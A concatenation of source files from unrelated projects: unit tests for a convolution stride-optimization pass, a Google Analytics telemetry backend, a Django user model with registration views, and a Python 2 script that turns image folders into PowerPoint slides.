'conv_4_w': {'value': None, 'shape': None, 'kind': 'data',
'dim_attrs': ['spatial_dims', 'channel_dims', 'batch_dims', 'axis']},
'conv_4_b': {'value': None, 'shape': None, 'kind': 'data'},
'conv_4_data': {'value': None, 'shape': None, 'kind': 'data'},
'conv_5': {'type': 'Convolution', 'kind': 'op', 'op': 'Conv2D', 'layout': 'NCHW',
'output_spatial_shape': None, 'output_shape': None, 'bias_term': True, 'group': 1,
'spatial_dims': np.array([2, 3]),
'channel_dims': np.array([1]), 'pad_spatial_shape': np.array([[0, 0], [0, 0]]),
'dilation': np.array([1, 1, 1, 1]),
'batch_dims': np.array([0]), 'infer': Convolution.infer,
'kernel_spatial_idx': np.array([2, 3], dtype=np.int64), 'input_feature_channel': 1,
'output_feature_channel': 0, },
'conv_5_w': {'value': None, 'shape': None, 'kind': 'data',
'dim_attrs': ['spatial_dims', 'channel_dims', 'batch_dims', 'axis']},
'conv_5_b': {'value': None, 'shape': None, 'kind': 'data'},
'conv_5_data': {'value': None, 'shape': None, 'kind': 'data'},
# ReLU
'relu_1': {'shape': None, 'type': 'ReLU', 'kind': 'op', 'op': 'ReLU', 'infer': copy_shape_infer},
'relu_1_data': {'value': None, 'shape': None, 'kind': 'data', 'data_type': None},
'relu_2': {'shape': None, 'type': 'ReLU', 'kind': 'op', 'op': 'ReLU', 'infer': copy_shape_infer},
'relu_2_data': {'value': None, 'shape': None, 'kind': 'data', 'data_type': None},
'relu_3': {'shape': None, 'type': 'ReLU', 'kind': 'op', 'op': 'ReLU', 'infer': copy_shape_infer},
'relu_3_data': {'value': None, 'shape': None, 'kind': 'data', 'data_type': None},
# Pooling
'pool_1': {'type': 'Pooling', 'kind': 'op', 'op': 'Pooling',
'spatial_dims': np.array([2, 3]),
'pad_spatial_shape': np.array([[0, 0], [0, 0]]),
'infer': Pooling.infer},
'pool_1_data': {'value': None, 'shape': None, 'kind': 'data'},
}
# In description of unit tests below will be used next syntax: Operation(NxM,XxY), where NxM - kernel size, XxY - stride
class ResnetOptimizationTests(unittest.TestCase):
# Pl->Conv(1x1,1x1)->Conv(1x1,2x2) => Pl->Conv(1x1,2x2)->Conv(1x1,1x1)
def test_resnet_optimization_1(self):
graph = build_graph(nodes_attributes,
[('placeholder_1', 'placeholder_1_data'),
('placeholder_1_data', 'conv_1'),
('conv_1_w', 'conv_1'),
('conv_1_b', 'conv_1'),
('conv_1', 'conv_1_data'),
('conv_1_data', 'conv_2'),
('conv_2_w', 'conv_2'),
('conv_2_b', 'conv_2'),
('conv_2', 'conv_2_data'),
],
{'placeholder_1_data': {'shape': np.array([1, 3, 224, 224])},
'conv_1_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
'conv_1': {'kernel_spatial': np.array([1, 1]),
'stride': np.array([1, 1, 1, 1]),
'output': np.array([3]), },
'conv_1_data': {'shape': np.array([1, 3, 224, 224])},
'conv_2_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
'conv_2': {'kernel_spatial': np.array([1, 1]),
'stride': np.array([1, 1, 2, 2]),
'output': np.array([3]), },
'conv_2_data': {'shape': np.array([1, 3, 112, 112])},
},
nodes_with_edges_only=True)
graph_ref = build_graph(nodes_attributes,
[('placeholder_1', 'placeholder_1_data'),
('placeholder_1_data', 'conv_1'),
('conv_1_w', 'conv_1'),
('conv_1_b', 'conv_1'),
('conv_1', 'conv_1_data'),
('conv_1_data', 'conv_2'),
('conv_2_w', 'conv_2'),
('conv_2_b', 'conv_2'),
('conv_2', 'conv_2_data'),
],
{'placeholder_1_data': {'shape': np.array([1, 3, 224, 224])},
'conv_1_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
'conv_1': {'kernel_spatial': np.array([1, 1]),
'stride': np.array([1, 1, 2, 2]),
'output': np.array([3]), },
'conv_1_data': {'shape': np.array([1, 3, 112, 112])},
'conv_2_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
'conv_2': {'kernel_spatial': np.array([1, 1]),
'stride': np.array([1, 1, 1, 1]),
'output': np.array([3]), },
'conv_2_data': {'shape': np.array([1, 3, 112, 112])},
},
nodes_with_edges_only=True)
graph.graph['layout'] = 'NCHW'
graph_ref.graph['layout'] = 'NCHW'
stride_optimization(graph)
(flag, resp) = compare_graphs(graph, graph_ref, 'conv_2_data', check_op_attrs=True)
self.assertTrue(flag, resp)
# Pl->Conv(3x3,2x2)->Conv(1x1,2x2) => Pl->Conv(3x3,4x4)->Conv(1x1,1x1)
def test_resnet_optimization_2(self):
graph = build_graph(nodes_attributes,
[('placeholder_1', 'placeholder_1_data'),
('placeholder_1_data', 'conv_1'),
('conv_1_w', 'conv_1'),
('conv_1_b', 'conv_1'),
('conv_1', 'conv_1_data'),
('conv_1_data', 'conv_2'),
('conv_2_w', 'conv_2'),
('conv_2_b', 'conv_2'),
('conv_2', 'conv_2_data'),
],
{'placeholder_1_data': {'shape': np.array([1, 3, 224, 224])},
'conv_1_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
'conv_1': {'kernel_spatial': np.array([1, 1]),
'stride': np.array([1, 1, 2, 2]),
'output': np.array([3]), },
'conv_1_data': {'shape': np.array([1, 3, 112, 112])},
'conv_2_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
'conv_2': {'kernel_spatial': np.array([1, 1]),
'stride': np.array([1, 1, 2, 2]),
'output': np.array([3]), },
'conv_2_data': {'shape': np.array([1, 3, 56, 56])},
},
nodes_with_edges_only=True)
graph_ref = build_graph(nodes_attributes,
[('placeholder_1', 'placeholder_1_data'),
('placeholder_1_data', 'conv_1'),
('conv_1_w', 'conv_1'),
('conv_1_b', 'conv_1'),
('conv_1', 'conv_1_data'),
('conv_1_data', 'conv_2'),
('conv_2_w', 'conv_2'),
('conv_2_b', 'conv_2'),
('conv_2', 'conv_2_data'),
],
{'placeholder_1_data': {'shape': np.array([1, 3, 224, 224])},
'conv_1_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
'conv_1': {'kernel_spatial': np.array([1, 1]),
'stride': np.array([1, 1, 4, 4]),
'output': np.array([3]), },
'conv_1_data': {'shape': np.array([1, 3, 56, 56])},
'conv_2_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
'conv_2': {'kernel_spatial': np.array([1, 1]),
'stride': np.array([1, 1, 1, 1]),
'output': np.array([3]), },
'conv_2_data': {'shape': np.array([1, 3, 56, 56])},
},
nodes_with_edges_only=True)
graph.graph['layout'] = 'NCHW'
graph_ref.graph['layout'] = 'NCHW'
stride_optimization(graph)
(flag, resp) = compare_graphs(graph, graph_ref, 'conv_2_data', check_op_attrs=True)
self.assertTrue(flag, resp)
# Pl->Conv(3x3,2x2)->Conv(3x3,2x2) => Same
def test_resnet_optimization_3(self):
graph = build_graph(nodes_attributes,
[('placeholder_1', 'placeholder_1_data'),
('placeholder_1_data', 'conv_1'),
('conv_1_w', 'conv_1'),
('conv_1_b', 'conv_1'),
('conv_1', 'conv_1_data'),
('conv_1_data', 'conv_2'),
('conv_2_w', 'conv_2'),
('conv_2_b', 'conv_2'),
('conv_2', 'conv_2_data'),
],
{'placeholder_1_data': {'shape': np.array([1, 3, 224, 224])},
'conv_1_w': {'value': np.zeros([3, 3, 3, 3]), 'shape': np.array([3, 3, 3, 3])},
'conv_1': {'kernel_spatial': np.array([3, 3]),
'stride': np.array([1, 1, 2, 2]),
'output': np.array([3]), },
'conv_1_data': {'shape': np.array([1, 3, 112, 112])},
'conv_2_w': {'value': np.zeros([3, 3, 3, 3]), 'shape': np.array([3, 3, 3, 3])},
'conv_2': {'kernel_spatial': np.array([3, 3]),
'stride': np.array([1, 1, 2, 2]),
'output': np.array([3]), },
'conv_2_data': {'shape': np.array([1, 3, 56, 56])},
},
nodes_with_edges_only=True)
graph_ref = build_graph(nodes_attributes,
[('placeholder_1', 'placeholder_1_data'),
('placeholder_1_data', 'conv_1'),
('conv_1_w', 'conv_1'),
('conv_1_b', 'conv_1'),
('conv_1', 'conv_1_data'),
('conv_1_data', 'conv_2'),
('conv_2_w', 'conv_2'),
('conv_2_b', 'conv_2'),
('conv_2', 'conv_2_data'),
],
{'placeholder_1_data': {'shape': np.array([1, 3, 224, 224])},
'conv_1_w': {'value': np.zeros([3, 3, 3, 3]), 'shape': np.array([3, 3, 3, 3])},
'conv_1': {'kernel_spatial': np.array([3, 3]),
'stride': np.array([1, 1, 2, 2]),
'output': np.array([3]), },
'conv_1_data': {'shape': np.array([1, 3, 112, 112])},
'conv_2_w': {'value': np.zeros([3, 3, 3, 3]), 'shape': np.array([3, 3, 3, 3])},
'conv_2': {'kernel_spatial': np.array([3, 3]),
'stride': np.array([1, 1, 2, 2]),
'output': np.array([3]), },
'conv_2_data': {'shape': np.array([1, 3, 56, 56])},
},
nodes_with_edges_only=True)
graph.graph['layout'] = 'NCHW'
graph_ref.graph['layout'] = 'NCHW'
stride_optimization(graph)
(flag, resp) = compare_graphs(graph, graph_ref, 'conv_2_data', check_op_attrs=True)
self.assertTrue(flag, resp)
# Pl--->Conv(3x3,2x2)->ReLU--->Eltwise-->Conv(1x1,2x2) => Pl--->Conv(3x3,4x4)->ReLU--->Eltwise-->Conv(1x1,1x1)
# `-->Conv(3x3,2x2)->ReLU---` `-->Conv(3x3,4x4)->ReLU---`
def test_resnet_optimization_4(self):
graph = build_graph(nodes_attributes,
[('placeholder_1', 'placeholder_1_data'),
('placeholder_1_data', 'conv_1'),
('conv_1_w', 'conv_1'),
('conv_1_b', 'conv_1'),
('conv_1', 'conv_1_data'),
('conv_1_data', 'relu_1'),
('relu_1', 'relu_1_data'),
('placeholder_1_data', 'conv_2'),
('conv_2_w', 'conv_2'),
('conv_2_b', 'conv_2'),
('conv_2', 'conv_2_data'),
('conv_2_data', 'relu_2'),
('relu_2', 'relu_2_data'),
('relu_1_data', 'eltwise_1'),
('relu_2_data', 'eltwise_1'),
('eltwise_1', 'eltwise_1_data'),
('eltwise_1_data', 'conv_3'),
('conv_3_w', 'conv_3'),
('conv_3_b', 'conv_3'),
('conv_3', 'conv_3_data'),
],
{'placeholder_1_data': {'shape': np.array([1, 3, 224, 224])},
'conv_1_w': {'value': np.zeros([3, 3, 3, 3]), 'shape': np.array([3, 3, 3, 3])},
'conv_1': {'kernel_spatial': np.array([3, 3]),
'stride': np.array([1, 1, 2, 2]),
'output': np.array([3]), },
'conv_1_data': {'shape': np.array([1, 3, 112, 112])},
'relu_1_data': {'shape': np.array([1, 3, 112, 112])},
'conv_2_w': {'value': np.zeros([3, 3, 3, 3]), 'shape': np.array([3, 3, 3, 3])},
'conv_2': {'kernel_spatial': np.array([3, 3]),
'stride': np.array([1, 1, 2, 2]),
'output': np.array([3]), },
'conv_2_data': {'shape': np.array([1, 3, 112, 112])},
'relu_2_data': {'shape': np.array([1, 3, 112, 112])},
'eltwise_1_data': {'shape': np.array([1, 3, 112, 112])},
'conv_3_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
'conv_3': {'kernel_spatial': np.array([1, 1]),
'stride': np.array([1, 1, 2, 2]),
'output': np.array([3]), },
'conv_3_data': {'shape': np.array([1, 3, 56, 56])},
},
nodes_with_edges_only=True)
graph_ref = build_graph(nodes_attributes,
[('placeholder_1', 'placeholder_1_data'),
('placeholder_1_data', 'conv_1'),
('conv_1_w', 'conv_1'),
('conv_1_b', 'conv_1'),
('conv_1', 'conv_1_data'),
('conv_1_data', 'relu_1'),
('relu_1', 'relu_1_data'),
('placeholder_1_data', 'conv_2'),
('conv_2_w', 'conv_2'),
('conv_2_b', 'conv_2'),
('conv_2', 'conv_2_data'),
('conv_2_data', 'relu_2'),
('relu_2', 'relu_2_data'),
('relu_1_data', 'eltwise_1'),
('relu_2_data', 'eltwise_1'),
('eltwise_1', 'eltwise_1_data'),
('eltwise_1_data', 'conv_3'),
('conv_3_w', 'conv_3'),
('conv_3_b', 'conv_3'),
('conv_3', 'conv_3_data'),
],
{'placeholder_1_data': {'shape': np.array([1, 3, 224, 224])},
'conv_1_w': {'value': np.zeros([3, 3, 3, 3]), 'shape': np.array([3, 3, 3, 3])},
'conv_1': {'kernel_spatial': np.array([3, 3]),
'stride': np.array([1, 1, 4, 4]),
'output': np.array([3])},
'conv_1_data': {'shape': np.array([1, 3, 56, 56])},
'relu_1_data': {'shape': np.array([1, 3, 56, 56])},
'conv_2_w': {'value': np.zeros([3, 3, 3, 3]), 'shape': np.array([3, 3, 3, 3])},
'conv_2': {'kernel_spatial': np.array([3, 3]),
'stride': np.array([1, 1, 4, 4]),
'output': np.array([3])},
'conv_2_data': {'shape': np.array([1, 3, 56, 56])},
'relu_2_data': {'shape': np.array([1, 3, 56, 56])},
'eltwise_1_data': {'shape': np.array([1, 3, 56, 56])},
'conv_3_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
'conv_3': {'kernel_spatial': np.array([1, 1]),
'stride': np.array([1, 1, 1, 1]),
'output': np.array([3])},
'conv_3_data': {'shape': np.array([1, 3, 56, 56])},
},
nodes_with_edges_only=True)
graph.graph['layout'] = 'NCHW'
graph_ref.graph['layout'] = 'NCHW'
# dump_graph_for_graphviz(graph)
# dump_graph_for_graphviz(graph_ref)
stride_optimization(graph)
(flag, resp) = compare_graphs(graph, graph_ref, 'conv_3_data', check_op_attrs=True)
self.assertTrue(flag, resp)
# Pl--->Conv(1x1,1x1)->ReLU--->Eltwise-->Conv(1x1,2x2) => Pl--->Conv(1x1,2x2)->ReLU--->Eltwise-->Conv(1x1,1x1)
# `----------------->ReLU---` `-->Pool(1x1,2x2)->ReLU---`
def test_resnet_optimization_5(self):
graph = build_graph(nodes_attributes,
[('placeholder_1', 'placeholder_1_data'),
('placeholder_1_data', 'conv_1'),
('conv_1_w', 'conv_1'),
('conv_1_b', 'conv_1'),
('conv_1', 'conv_1_data'),
('conv_1_data', 'relu_1'),
('relu_1', 'relu_1_data'),
('placeholder_1_data', 'relu_2'),
('relu_2', 'relu_2_data'),
('relu_1_data', 'eltwise_1'),
('relu_2_data', 'eltwise_1'),
('eltwise_1', 'eltwise_1_data'),
('eltwise_1_data', 'conv_3'),
('conv_3_w', 'conv_3'),
('conv_3_b', 'conv_3'),
('conv_3', 'conv_3_data'),
],
{'placeholder_1_data': {'shape': np.array([1, 3, 224, 224])},
'conv_1_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
'conv_1': {'kernel_spatial': np.array([1, 1]),
'stride': np.array([1, 1, 1, 1]),
'output': np.array([3]), },
'conv_1_data': {'shape': np.array([1, 3, 224, 224])},
'relu_1_data': {'shape': np.array([1, 3, 224, 224])},
'relu_2_data': {'shape': np.array([1, 3, 224, 224])},
'eltwise_1_data': {'shape': np.array([1, 3, 224, 224])},
'conv_3_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
'conv_3': {'kernel_spatial': np.array([1, 1]),
'stride': np.array([1, 1, 2, 2]),
'output': np.array([3]), },
'conv_3_data': {'shape': np.array([1, 3, 112, 112])},
},
nodes_with_edges_only=True)
graph_ref = build_graph(nodes_attributes,
[('placeholder_1', 'placeholder_1_data'),
('placeholder_1_data', 'conv_1'),
('conv_1_w', 'conv_1'),
('conv_1_b', 'conv_1'),
('conv_1', 'conv_1_data'),
('conv_1_data', 'relu_1'),
('relu_1', 'relu_1_data'),
('placeholder_1_data', 'pool_1'),
('pool_1', 'pool_1_data'),
('pool_1_data', 'relu_2'),
('relu_2', 'relu_2_data'),
('relu_1_data', 'eltwise_1'),
('relu_2_data', 'eltwise_1'),
('eltwise_1', 'eltwise_1_data'),
('eltwise_1_data', 'conv_3'),
('conv_3_w', 'conv_3'),
('conv_3_b', 'conv_3'),
('conv_3', 'conv_3_data'),
],
{'placeholder_1_data': {'shape': np.array([1, 3, 224, 224])},
'conv_1_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
'conv_1': {'kernel_spatial': np.array([1, 1]),
'stride': np.array([1, 1, 2, 2]),
'output': np.array([3])},
'conv_1_data': {'shape': np.array([1, 3, 112, 112])},
'relu_1_data': {'shape': np.array([1, 3, 112, 112])},
'pool_1': {'stride': np.array([1, 1, 2, 2])},
'pool_1_data': {'shape': np.array([1, 3, 112, 112])},
'relu_2_data': {'shape': np.array([1, 3, 112, 112])},
'eltwise_1_data': {'shape': np.array([1, 3, 112, 112])},
'conv_3_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
'conv_3': {'kernel_spatial': np.array([1, 1]),
'stride': np.array([1, 1, 1, 1]),
'output': np.array([3])},
'conv_3_data': {'shape': np.array([1, 3, 112, 112])},
},
nodes_with_edges_only=True)
graph.graph['layout'] = 'NCHW'
graph_ref.graph['layout'] = 'NCHW'
# dump_graph_for_graphviz(graph)
# dump_graph_for_graphviz(graph_ref)
stride_optimization(graph)
(flag, resp) = compare_graphs(graph, graph_ref, 'conv_3_data', check_op_attrs=True)
self.assertTrue(flag, resp)
# Pl->Conv(1x1,1x1)->Conv(1x1,2x2)->Conv(3x3,1x1)->Conv(1x1,2x2)
# =>
# Pl->Conv(1x1,2x2)->Conv(1x1,1x1)->Conv(3x3,2x2)->Conv(1x1,1x1)
def test_resnet_optimization_6(self):
graph = build_graph(nodes_attributes,
[('placeholder_1', 'placeholder_1_data'),
('placeholder_1_data', 'conv_1'),
('conv_1_w', 'conv_1'),
('conv_1_b', 'conv_1'),
('conv_1', 'conv_1_data'),
('conv_1_data', 'conv_2'),
('conv_2_w', 'conv_2'),
('conv_2_b', 'conv_2'),
('conv_2', 'conv_2_data'),
('conv_2_data', 'conv_3'),
('conv_3_w', 'conv_3'),
('conv_3_b', 'conv_3'),
('conv_3', 'conv_3_data'),
('conv_3_data', 'conv_4'),
('conv_4_w', 'conv_4'),
('conv_4_b', 'conv_4'),
('conv_4', 'conv_4_data'),
],
{'placeholder_1_data': {'shape': np.array([1, 3, 224, 224])},
'conv_1_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
'conv_1': {'kernel_spatial': np.array([1, 1]),
'stride': np.array([1, 1, 1, 1]),
'output': np.array([3]), },
'conv_1_data': {'shape': np.array([1, 3, 224, 224])},
'conv_2_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
'conv_2': {'kernel_spatial': np.array([1, 1]),
'stride': np.array([1, 1, 2, 2]),
'output': np.array([3]), },
'conv_2_data': {'shape': np.array([1, 3, 112, 112])},
'conv_3_w': {'value': np.zeros([3, 3, 3, 3]), 'shape': np.array([3, 3, 3, 3])},
'conv_3': {'kernel_spatial': np.array([3, 3]),
'stride': np.array([1, 1, 1, 1]),
'output': np.array([3]), },
'conv_3_data': {'shape': np.array([1, 3, 110, 110])},
'conv_4_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
'conv_4': {'kernel_spatial': np.array([1, 1]),
'stride': np.array([1, 1, 2, 2]),
'output': np.array([3]), },
'conv_4_data': {'shape': np.array([1, 3, 55, 55])},
},
nodes_with_edges_only=True)
graph_ref = build_graph(nodes_attributes,
[('placeholder_1', 'placeholder_1_data'),
('placeholder_1_data', 'conv_1'),
('conv_1_w', 'conv_1'),
('conv_1_b', 'conv_1'),
('conv_1', 'conv_1_data'),
('conv_1_data', 'conv_2'),
('conv_2_w', 'conv_2'),
('conv_2_b', 'conv_2'),
('conv_2', 'conv_2_data'),
('conv_2_data', 'conv_3'),
('conv_3_w', 'conv_3'),
('conv_3_b', 'conv_3'),
('conv_3', 'conv_3_data'),
('conv_3_data', 'conv_4'),
('conv_4_w', 'conv_4'),
('conv_4_b', 'conv_4'),
('conv_4', 'conv_4_data'),
],
{'placeholder_1_data': {'shape': np.array([1, 3, 224, 224])},
'conv_1_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
'conv_1': {'kernel_spatial': np.array([1, 1]),
'stride': np.array([1, 1, 2, 2]),
'output': np.array([3])},
'conv_1_data': {'shape': np.array([1, 3, 112, 112])},
'conv_2_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
'conv_2': {'kernel_spatial': np.array([1, 1]),
'stride': np.array([1, 1, 1, 1]),
'output': np.array([3])},
'conv_2_data': {'shape': np.array([1, 3, 112, 112])},
'conv_3_w': {'value': np.zeros([3, 3, 3, 3]), 'shape': np.array([3, 3, 3, 3])},
'conv_3': {'kernel_spatial': np.array([3, 3]),
'stride': np.array([1, 1, 2, 2]),
'output': np.array([3])},
'conv_3_data': {'shape': np.array([1, 3, 55, 55])},
'conv_4_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
'conv_4': {'kernel_spatial': np.array([1, 1]),
'stride': np.array([1, 1, 1, 1]),
'output': np.array([3])},
'conv_4_data': {'shape': np.array([1, 3, 55, 55])},
},
nodes_with_edges_only=True)
graph.graph['layout'] = 'NCHW'
graph_ref.graph['layout'] = 'NCHW'
stride_optimization(graph)
(flag, resp) = compare_graphs(graph, graph_ref, 'conv_4_data', check_op_attrs=True)
self.assertTrue(flag, resp)
```
#### File: telemetry/backend/backend_ga.py
```python
import uuid
from telemetry.backend.backend import TelemetryBackend
from telemetry.utils.message import Message, MessageType
from telemetry.utils.guid import get_or_generate_uid
class GABackend(TelemetryBackend):
backend_url = 'https://www.google-analytics.com/collect'
id = 'ga'
def __init__(self, tid: str = None, app_name: str = None, app_version: str = None):
super(GABackend, self).__init__(tid, app_name, app_version)
if tid is None:
tid = 'UA-17808594-29'
self.tid = tid
self.uid = get_or_generate_uid('openvino_ga_uid', lambda: str(uuid.uuid4()), is_valid_uuid4)
self.app_name = app_name
self.app_version = app_version
self.default_message_attrs = {
'v': '1', # API Version
'tid': self.tid,
'cid': self.uid,
'an': self.app_name,
'av': self.app_version,
'ua': 'Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14' # dummy identifier of the browser
}
def send(self, message: Message):
try:
import requests
requests.post(self.backend_url, message.attrs, timeout=1.0)
except Exception:
pass
def build_event_message(self, event_category: str, event_action: str, event_label: str, event_value: int = 1,
**kwargs):
data = self.default_message_attrs.copy()
data.update({
't': 'event',
'ec': event_category,
'ea': event_action,
'el': event_label,
'ev': event_value,
})
return Message(MessageType.EVENT, data)
def build_session_start_message(self, **kwargs):
data = self.default_message_attrs.copy()
data.update({
'sc': 'start',
't': 'event',
'ec': 'session',
'ea': 'control',
'el': 'start',
'ev': 1,
})
return Message(MessageType.SESSION_START, data)
def build_session_end_message(self, **kwargs):
data = self.default_message_attrs.copy()
data.update({
'sc': 'end',
't': 'event',
'ec': 'session',
'ea': 'control',
'el': 'end',
'ev': 1,
})
return Message(MessageType.SESSION_END, data)
def build_error_message(self, error_msg: str, **kwargs):
pass
def build_stack_trace_message(self, error_msg: str, **kwargs):
pass
def is_valid_uuid4(uid: str):
try:
uuid.UUID(uid, version=4)
except ValueError:
return False
return True
``` |
{
"source": "jochanmin/Blog",
"score": 2
} |
#### File: backend/users/models.py
```python
from django.contrib.auth.models import (
BaseUserManager, AbstractBaseUser, PermissionsMixin,User
)
from django.db import models
from django.utils import timezone
from django.utils.translation import ugettext_lazy as _
class UserManager(BaseUserManager):
def create_user(self, email, nickname, password=<PASSWORD>):
"""
주어진 이메일, 닉네임, 비밀번호 등 개인정보로 User 인스턴스 생성
"""
if not email:
raise ValueError(_('Users must have an email address'))
user = self.model(
email=self.normalize_email(email),
nickname=nickname,
)
user.set_password(password)
user.save(using=self._db)
return user
def create_superuser(self, email, nickname , password):
"""
주어진 이메일, 닉네임, 비밀번호 등 개인정보로 User 인스턴스 생성
단, 최상위 사용자이므로 권한을 부여한다.
"""
user = self.create_user(
email=email,
password=password,
nickname=nickname,
)
user.is_superuser = True
user.save(using=self._db)
return user
class User(AbstractBaseUser, PermissionsMixin):
email = models.EmailField(
verbose_name=_('Email address'),
max_length=255,
unique=True,
)
nickname = models.CharField(
verbose_name=_('Nickname'),
default='Jake',
max_length=30,
unique=True
)
is_active = models.BooleanField(
verbose_name=_('Is active'),
default=True
)
date_joined = models.DateTimeField(
verbose_name=_('Date joined'),
default=timezone.now
)
# 이 필드는 레거시 시스템 호환을 위해 추가할 수도 있다.
salt = models.CharField(
verbose_name=_('Salt'),
max_length=10,
blank=True
)
objects = UserManager()
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = ['nickname', ]
class Meta:
verbose_name = _('user')
verbose_name_plural = _('users')
ordering = ('-date_joined',)
def __str__(self):
return self.nickname
def get_full_name(self):
return self.nickname
def get_short_name(self):
return self.nickname
@property
def is_staff(self):
"Is the user a member of staff?"
# Simplest possible answer: All superusers are staff
return self.is_superuser
get_full_name.short_description = _('Full name')
```
#### File: backend/users/views.py
```python
from django.shortcuts import render
from django.core import serializers
from .models import User
from django.forms.models import model_to_dict
from rest_framework import status
from rest_framework.response import Response
from rest_framework.decorators import api_view, permission_classes
from rest_framework.permissions import IsAuthenticated
#회원가입 /users/auth/
#아이디를 등록하는곳 /users/register
@api_view(['POST'])
def register(request):
data=request.data
if all(i in data for i in ('email','nickname','password')):
email_check=User.objects.filter(email=data['email'])
nick_check=User.objects.filter(nickname=data['nickname'])
if email_check.exists():
return Response({"message": "email already exists"}, status=status.HTTP_409_CONFLICT)
elif nick_check.exists():
return Response({"message": "nickname already exists"}, status=status.HTTP_409_CONFLICT)
else:
user = User.objects.create_user(
data['email'],
data['nickname'],
data['password'],
)
user.save()
return Response(model_to_dict(user), status=status.HTTP_201_CREATED)
else:
return Response({"message": "key error"}, status=status.HTTP_400_BAD_REQUEST)
# 토큰을 주면 해당 유저의 정보를 얻는 곳 /users/users
@api_view(['GET'])
@permission_classes((IsAuthenticated,))
def info(request):
user = request.user
data = request.data
try:
searchU=User.objects.filter(email=user.email)
if searchU.count==0:
return Response({"message": "Can't find info"}, status=status.HTTP_404_NOT_FOUND)
data = {
'email': user.email,
'nickname':user.nickname
}
return Response((data), status=status.HTTP_200_OK)
except User.DoesNotExist:
return Response({"message": "info does not exists"}, status=status.HTTP_404_NOT_FOUND)
``` |
{
"source": "jochasinga/file2slide",
"score": 3
} |
#### File: jochasinga/file2slide/file2slide.py
```python
from pptx import Presentation
from pptx.util import Inches
from wand.image import Image
import os, os.path
layoutMode = {
'TITLE' : 0,
'TITLE_AND_CONTENT' : 1,
'SECTION_HEADER' : 2,
'SEQUE' : 2,
'TWO_CONTENT' : 3,
'COMPARISON' : 4,
'TITLE_ONLY' : 5,
'BLANK' : 6,
'CONTENT_WITH_CAPTION' : 7,
'PICTURE_WITH_CAPTION' : 8,
'' : 6
}
# Crop images
def crop_image(path):
print "Entering crop_image()"
subfiles = os.listdir(path)
left = int(raw_input("LEFT CROP: "))
top = int(raw_input("TOP CROP: "))
# TODO: Figure out how to configure right and bottom crop
#right = raw_input(float("RIGHT CROP: ").strip())
#bottom = raw_input(float("BOTTOM CROP: ").strip())
for sf in subfiles:
if os.path.join(path, sf).lower().endswith(('.jpg', '.png', '.jpeg', '.gif', '.tiff',)):
print "cropping %s" % (os.path.join(path, sf))
with Image(filename=os.path.join(path, sf)) as img:
img.crop(left=left, top=top, width=img.width, height=img.height)
img.save(filename=os.path.join(path, sf))
def pdf2image(path, *pages):
# converting first page into JPG
if pages:
for page in pages:
newpath = path + ('[%s]' % page)
with Image(filename=newpath) as img:
imagepath = os.path.splitext(path)[0] + '.jpg'
img.save(filename=imagepath)
# TODO: Refactor so that yielding is done only in filter_files()
yield imagepath
# Filter files and images
def filter_files(path):
files = os.listdir(path)
for f in files:
root = os.path.join(path, f)
if os.path.isdir(root):
print "Expecting FILE, got DIR!"
if os.path.basename(root) == 'crop':
print "Found a subdirectory named 'crop'"
print """
######################## CROP IMAGES #######################\r
+ Set CROPPING for all images inside 'crop' directory.\r
+ The values are LEFT, TOP, RIGHT, and BOTTOM.\r
+ OR /images for relative path.\r
############################################################\n
"""
crop_image(root)
subfiles = os.listdir(root)
for sf in subfiles:
if sf.lower().endswith(('.jpg', '.png', '.jpeg', '.gif', '.tiff',)):
yield os.path.join(root, sf)
elif os.path.isfile(root):
if root.lower().endswith(('.jpg', '.png', '.jpeg', '.gif', '.tiff',)):
yield root
elif root.lower().endswith('.pdf'):
pdf2image(root, 0)
print """
#################### LOCATE DIRECTORY #######################\r
+ Locate the directory where your images are located.\r
+ For example: User/Macbook/Pictures for absolute path,\r
+ OR /images for relative path.\r
+ Make sure no subdirectories are present in the directory.\r
+ Optionally, you can drag the directory into the terminal\r
+ window after the prompt.\r
#############################################################\n
"""
img_path = raw_input("Where is the images folder?: ").strip()
# Create a presentation file
print "Creating presentation..."
prs = Presentation()
print """
##################### CHOOSE LAYOUT STYLE ######################\r
+ Powerpoint comes with several layout styles for slides.\r
+ For example: TITLE, TITLE_WITH_CONTENT, BLANK, etc.\r
+ Type the preferred style in UPPERCASE into the next prompt\r
+ OR hit RETURN for default BLANK style.\r
"""
for mode in (k for k in layoutMode if k != ''):
print mode
print """
################################################################\r
"""
layout_mode = raw_input("\nWhat's your slides layout style?: ").strip()
slide_layout = prs.slide_layouts[layoutMode[layout_mode]]
print"""
######################## SET MARGINS ###########################\r
+ Set LEFT, TOP, and RIGHT margins of your images.\r
+ Note that if RIGHT margin is set, images will be scaled\r
+ proportionally to fit. Otherwise, hit RETURN when\r
+ prompted to set margin to 0 (fit to the slide).\r
+ Margins are in inches.\r
#################################################################\n
"""
